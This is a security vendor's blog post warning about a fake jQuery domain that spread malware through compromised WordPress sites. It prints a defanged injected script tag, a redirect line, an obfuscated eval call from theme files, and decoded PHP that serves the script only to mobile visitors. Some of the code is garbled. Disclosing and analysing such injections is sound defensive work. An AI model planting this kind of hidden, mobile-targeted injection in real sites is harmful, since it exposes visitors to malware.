Careful With Fake jQuery Website – jquery-framework. com

A few days ago we posted in our Labs notes about a Fake jQuery website that is distributing malware. The domain was properly chosen to confuse the end-users ( ), since it looks like a valid site.

This is what we were seeing injected on some websites:

<script src="httx://

Some people have even complained to us that we’re flagging jQuery by mistake. However, when you visit that page you see that it does not have the jQuery code, just a redirection to

window.location = "httx://";

Which then redirects the browser to additional malicious domains. This is the full path: -> -> ->

or -> -> -> ->

Compromised WordPress sites

Since we initially started seeing this and posted in our Labs, we’re seeing even more websites compromised with it (mostly on outdated WordPress). We had the chance to analyze some of them and they had the following eval code being used to hide the malware (inside the theme files):

eval ("145166141154�50142 .. 141163145�66�64137")

Which when decoded executes the following:

if ((preg_match("/text/vnd.wap.wml|application/vnd.wap.xhtml+xml/si", @$_SERVER["HTTP_ACCEPT'].. ||preg_match('/alcatel|amoi|android|avantgo|blackberry|..
vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) || 
       preg_match('/msearch|m?q=/si', @$_SERVER['HTTP_REFERER'])) && 
@$_SERVER['HTTP_USER_AGENT'])) { echo "<script src="httx://"..'; 
exit; }

If you are not familiar with PHP, it will check if you are visiting the site from a mobile phone (ipod, ipad, iphone, etc) and if you are, it inserts the code on the site. Since Google (and other AV blacklists) aren’t flagging this domain, users will receive no warning of what is happening.

We’re definitely flagging it, make sure to scan your site for free using Sucuri SiteCheck to make sure you’re good to go.

Scan your website for free:
About Daniel Cid

Daniel is the Founder & CTO of Sucuri and also the founder of the open source project - OSSEC HIDS. His interests range from intrusion detection, log analysis (log-based intrusion detection), web-based malware research and secure development.

You can find more about Daniel at his site or on Twitter: @danielcid